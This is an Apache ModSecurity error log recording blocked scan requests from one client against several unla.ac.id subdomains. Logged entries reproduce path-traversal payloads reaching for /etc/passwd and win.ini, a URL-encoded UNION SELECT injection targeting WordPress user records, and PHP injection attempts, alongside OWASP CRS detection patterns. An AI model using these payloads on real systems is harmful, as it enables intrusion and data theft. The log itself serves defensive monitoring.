[Tue Aug 29 11:42:41.480976 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAQSW2MAAAA0"]
[Tue Aug 29 11:42:41.492987 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeDiqYAAAAx"]
[Tue Aug 29 11:42:42.361525 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAeDiqcAAAAx"]
[Tue Aug 29 11:42:42.371931 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdXIngAAAAd"]
[Tue Aug 29 11:42:42.377725 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAd64RIAAAAp"]
[Tue Aug 29 11:42:42.401759 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdftTAAAAAG"]
[Tue Aug 29 11:42:42.421342 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAd4axcAAAAj"]
[Tue Aug 29 11:42:43.369176 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAcoNj4AAAAF"]
[Tue Aug 29 11:42:43.369247 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdOeSkAAAAS"]
[Tue Aug 29 11:42:43.374078 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAd-FzsAAAAt"]
[Tue Aug 29 11:42:43.416941 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAeDiqoAAAAx"]
[Tue Aug 29 11:42:43.417387 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdlvcEAAAAl"]
[Tue Aug 29 11:42:43.432870 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAcvBmsAAAAJ"]
[Tue Aug 29 11:42:44.747172 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13RMCo-f0AAAQSW2kAAAA0"]
[Tue Aug 29 11:42:44.822277 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13RMCo-f0AAAd231oAAAAI"]
[Tue Aug 29 11:42:46.361195 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAeYbx0AAAAB"]
[Tue Aug 29 11:42:46.370595 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAd2318AAAAI"]
[Tue Aug 29 11:42:46.380299 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAcoNkUAAAAF"]
[Tue Aug 29 11:42:46.439302 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdV7dYAAAAa"]
[Tue Aug 29 11:42:46.494771 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcvBnMAAAAJ"]
[Tue Aug 29 11:42:46.540953 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAenGXkAAAAM"]
[Tue Aug 29 11:42:46.544312 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAdV7dgAAAAa"]
[Tue Aug 29 11:42:46.551602 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcoNkcAAAAF"]
[Tue Aug 29 11:42:46.554468 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcvBnQAAAAJ"]
[Tue Aug 29 11:42:46.559681 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAd232IAAAAI"]
[Tue Aug 29 11:42:47.397578 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAd5ntAAAAAm"]
[Tue Aug 29 11:42:47.399056 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAXNuW8AAAAg"]
[Tue Aug 29 11:42:47.402201 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAdlvc4AAAAl"]
[Tue Aug 29 11:42:47.404347 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAd@4AIAAAAs"]
[Tue Aug 29 11:42:47.409172 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAdftTwAAAAG"]
[Tue Aug 29 11:42:47.413185 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13R8Co-f0AAAeX1BkAAAAK"]
[Tue Aug 29 11:42:47.414313 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAdV7dwAAAAa"]
[Tue Aug 29 11:42:47.414571 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13R8Co-f0AAAd-Fz0AAAAt"]
[Tue Aug 29 11:42:47.417732 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAd232UAAAAI"]
[Tue Aug 29 11:42:48.385075 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAd@4AMAAAAs"]
[Tue Aug 29 11:42:48.387576 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAeYbyMAAAAB"]
[Tue Aug 29 11:42:48.391492 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAdUc28AAAAZ"]
[Tue Aug 29 11:42:48.409297 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdxUSYAAAAC"]
[Tue Aug 29 11:42:48.409691 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAbo-egAAAAi"]
[Tue Aug 29 11:42:48.412057 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAARpg2YAAAAU"]
